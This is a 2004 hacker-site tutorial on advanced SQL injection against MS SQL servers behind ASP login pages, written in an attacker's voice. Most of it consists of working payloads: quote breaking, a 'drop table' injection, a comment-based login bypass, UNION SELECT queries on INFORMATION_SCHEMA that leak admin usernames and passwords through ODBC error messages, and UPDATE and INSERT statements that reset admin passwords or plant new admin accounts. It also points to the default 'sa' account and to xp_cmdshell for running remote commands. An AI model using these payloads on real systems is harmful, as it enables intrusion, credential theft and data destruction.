ADVANCED SQL INJECTIONS AUTHOR: SUBBY http://hackerlounge.no-ip.com http://www.hackerlounge.com DIS-LAMER Once again, i am NOT responsible for the information provided in this tutorial. Do not use it with malice, it is for web developers and admins who deal with an SQL server. This tutorial may be hosted on any other site, as long as it remains un-modified in any way, shape or form. I DO NOT take responsibilty with what you do with this information. ADVANCED SQL This is a paper on advanced SQL injections. It is presumed that you have knowledge of basic Authorisation Bypass of SQL login pages using query strings and basic knowledge of SQL. Read my "Beginners Guide To SQL Injections" before you read this tutorail, as it requires the knowledge raised in that paper Index 1.1- INTRODUCTION 1.2- BACKGROUND INFORMATION 1.3- BASIC OVERVIEW 2.1- BREAKING THE QUOTES 2.2- UNION TABLES AND ODBC ERRORS 3.1- GAINING TABLE STRUCTURE 3.2- UNION THROUGH INTERGER 3.3- NUMERIC BYPASS 3.4- INSERTING TABLE DATA 3.5- INSERTING SYNTAX ERRORS 3.6- HOW TO KNOW IF INJECTION IS SUCCESSFUL 3.7- 'SA' MASTER USER 1.1- INTRODUCTION This document raises many issues concering the security of SQL servers, in particular, MS SQL. However, the information can also be used for other SQL database security, such as Oracle. This document will show how to gain access to ANY user through the login pages of 'Active Server Pages (.asp)'. 1.2- BACKGROUND INFORMATION I will not go into to much bacground information, as most of it has been raised in my previous paper. SQL is a language that is used to communicate to its Relational Database. We will be raising many methods of attacks in this paper, the main one being the 'Query'. A query is a string that is injected into the server, to fool the server into giving it access to it. The main type of attacks we will be using in the paper are attacks resulting in detailed Error Messages. 1.3- BASIC OVERVIEW I am only going to touch on this, because you should have a basic understanding of SQL, SQL clauses, SQL querys and SQL statements. Here is a breif example of an SQL statement: SELECT product name, product cost, product ID from products Using our SELECT clause, we have selected, from the 'Products' Table, the 'Product Name', 'Product Cost' and 'Product ID, we might get the following results Name Cost ID Product1 17 3 Product2 123 2 Product3 45 1 Product4 134 1 Product5 56 3 We note that one of these is a string, and two are numbers. Product Name = String, Product Cost & Product ID = Number. Now besides the obvious fact that the Cost and ID are numeric, there is one other significant difference. Strings are contained withing single quotes whist numbers are not, we will find out why after. Now let us expand this statement more, and add more clauses and conditions to the statement: SELECT product name, product cost, product ID from products WHERE product cost = > 20 and product ID = 1 This will again select the Product Name, Cost and ID from the Products table. However, it will only select fields that have the Product Cost more then $20 and the Product ID as 1, we might get the following results: Name Cost ID Product3 45 1 Product4 134 1 Our conditions are met. The product cost is greater than 20 and the ID = 1 2.1- BREAKING THE QUOTES Now we will preform a simple, advanced SQL injection, confused? good. For this type of injection, however, we will need to break through the quotes. We know that when a String is inserted into an .asp login, the query is automaticly added quotes to the start and end of the string. For example: Login= William Pass= Will Our SQL statement would look like this SELECT * FROM table1 WHERE login=' William ' and pass=' will ' This is fine, and our login would be successful, but suppose we were to "break through the quotes" or the strings Login= Will'iam Pass= Will Now we would get an error message, something along the lines of "Server Error: Incorrect Syntax near 'iam'" See how we broke out of the quotes, and the server thought we were requesting the user 'iam'. Now let specify another input: Login= will'; drop table pass-- Pass= Now this is interesting. The ";" tells the SQL server that it has terminated all clauses/querys/statements, and to begin another. It is like the period "." character in english. The "drop table pass" will drop the pass table, and the -- will make the rest of the query not be checked, passed or processed. -- Is needed for the query to terminate without an error Now, if the target is vulnerable to SQL (see my previous paper), one might be able to log on (if one knows the user name) to the database using the following injection Username: Username'-- 2.2- UNION TABLES AND ODBC ERRORS The MS SQL server has very detailed error messages, some would say a little to detailed, and this statement is correct. The SQL server runs ODBC errors, which we can use to get access to the server under any user name we want, we can even make up users through a few SQL statements. However, this is not as simple as it may sound, and a hacker will need to know the database in order to gain access to it, other wise they have slim-to-none chance of getting in. There are many ways you can do this. 3.1- GAINING TABLE STRUCTURE The best method of gaining information about the table structure is by viewing the source of the Active Server Page. We might come across the follwing code: [code] function checkRequired() { if (!document.Form1.UserID.value.length || !document.Form1.Password.value.length || !document.Form1.ConfirmPassword.value.length ) { alert('You have not completed all required fields:\n'); //if ( document.Form1.Password.value == document.Form1.ConfirmPassword.value) // { return true; // } } else { if ( document.Form1.Password.value == document.Form1.ConfirmPassword.value) { return false; } alert('Password and confirmpassord are not same:\n'); return true; } } [/code] This tells us that the Users table name is called ‘UserID’ and the password table is called ‘Password’, makes sense. So now the attacker will have the basic structure of your database, which they can then modify query strings to gain access to the database. 3.2- UNION THROUGH INTERGER While searching, one might come accross a url that looks something like the following example: www.somesite.com/index.asp?ID=1337 *NOTE* ID=1 is a completly different page to that of ID=2 In the example, 1337 is the interger. What a hacker will then do, is try to use the UNION clause to union the interger "1337" with another string from the database. Now, what the attacker wishes to achive in the next statement, is to get the TABLE names, so he or she can then manipulate it to his or hers own needs. An attacker might use the following Statement: www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- We note that INFORMATION_SCHEMA.TABLES contains ALL information about subsequent tables. Now lets run this out bit by bit. Using our clause, we are selecting the top Table Name from the Information Schema table. We will get the following ODBC error: [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Table' to a column of data type int. This tells us that the first table in "INFORMATION_SCHEMA.TABLES" is ‘Table’. The way it does it, is the SQL server tried to union the nvarchar into an interger, thus we get an error message. And we go further: www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'-- What the attacker is doing here, is using the LIKE clause. It is selecting the top Table Name where the Table Name is Like "login". We get the following error message: [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. %25%login%25% will be seen in the query, and the first matching table that matches the criteria will be spewed out, in this case, admin_login Now let us get the first name in the admin_login table, we do that by injecting the following SQL statement into the URL: www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 login_name FROM admin_login-- [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '4DM1N' to a column of data type int. Now we see that the first username in the table ‘admin_login’ is '4DM1N', but what use is a username, if there is no password: www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'-- [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'haxxOre' to a column of data type int. SUCESS! We may now login as admin, using the username 4DM1N and the pass haxxOre 3.3- NUMERIC BYPASS In the previous example, if the password was a numeric string, that is, a characted was between 0-9, we will more then likely get a HTTP error. The reason for this is because the the numeric string, will be converted by the UNION into a nvarchar (string) before being UNIONED into an interger, thus an ODBC error will not concur. However, there is a very simple way to bypass this. Even if the password was numeric, we still would have gotten the username of the admin, so let us go from there (and presume the pass for '4DM1N' is '1337). We would use the following SQL statement: www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 convert(int, password%2b'%20hackers') FROM admin_login where login_name='4DM1N'-- Now i know alot of people will be going WTF? right now, so i will s-p-e-l-l it out. We will UNION the numeric password with a string to get the final output as a string, with the numeric value. We inserted the plus (+) sign to intergrate the 2 different values. *NOTE* the ASSCII code for + is 2b (0x2b), and '(space) is 20. Therefore, we will get the following ODBC error: Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1337 hackers' to a column of data type int. We clearly see here that the pass is 1337, and can now login to 4DM1N with the pass 1337 3.4- INSERTING TABLE DATA It is possible for the attackers to change the pass of an exsiting admin using the UPDATE clause, or even create a new user using the INSERT clause (this is why it is very important for the attacker to know the structure of the database) www.somesite.com/index.asp?ID=1337; UPDATE 'admin_login' SET 'password' = 'haxxOre' WHERE login_name='4DM1N'-- The password for '4DM1N' will be changed, even though we dont know the existing password www.somesite.com/index.asp?ID=1337; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (98989,'4DM1N2','haxx','none')-- This will set a new user '4DM1N2' with the password 'haxx'. The login ID will be 98989 (it is best to choose something obscure so it will not be in use). We would now be able to login to the database as admin with the pass 4DM1N2 and the pass haxx 3.5- INSERTING SYNTAX ERRORS Without knowing much information about the database structure, the attacker may delibertly inject strings that give a syntax error. Some of these will return very useful information, some will not. ‘ BadValue’ ‘BadValue ‘ OR ‘ ‘ OR ; 9,9,9 [author unknown] 3.6- HOW TO KNOW IF INJECTION IS SUCCESSFUL Hackers hope that when they inject a parameter, the server will produce a nice ODBC error. However, this is not always the case, however that does not mean that injection has not occured, or the server is not vulnerable. Even though the web developers have tested the server 10 times over they may have left out one harmful parameter, so the hacker must try everything, mess with anything and hope that they have missed something. If the SQL server provides an error server of some sort, more often then not injection was successful, but it is not obvious to the attacker, they must look everywhere for the error messages, this can sometimes prove very difficult. The first thing you should do, is check the source of the sight, and search for things like; - ODBC - SQL Sserver - nvarchar - error - syntax It is not unusuall for the developers to hide error messages, check the headers!! As strange as this must seem, many applications use it. Look for for linked pages. The developers may also use page redirects to hide the error messages from attackers. I have seen many websites, when you are supposed to recive an error message come up with witty comments like "=) how about...no" or "i am unhackable". This however, is not the case =) the error message was in the source. Check everywhere! 3.7- 'SA' MASTER USER There is a default stored user with the name of 'sa' with no password, which is much like a root password. You may want to mess around with this. Some sites even show that the username is active in their source!! *NOTE* There is a way to run arbitary commands remotly through MS SQLS port. This is by usings the following: xp_cmdshell, xp_msver, sp_passsword, sp_tables, xp_msver, xp_regdeletekey and many more. These are packed with MS SQL. *NOTE* xp is not associated in anyway with microsofts XP OS, so do not make the mistake of thinking that it is default with the OS. I am not going to comment on how to hack with these as quite frankly i cannot be bothered, and it is another whole paper I hope you liked my tutorial, please send any feedback How to get in contact with me If you have any feedback let me know via hotaspie@hotmail.com or the TGS forums located at http://www.hackerlounge.com or http://hackerlounge.no-ip.com AUTHOR: Subby http://hackerlounge.no-ip.com Copyright 2004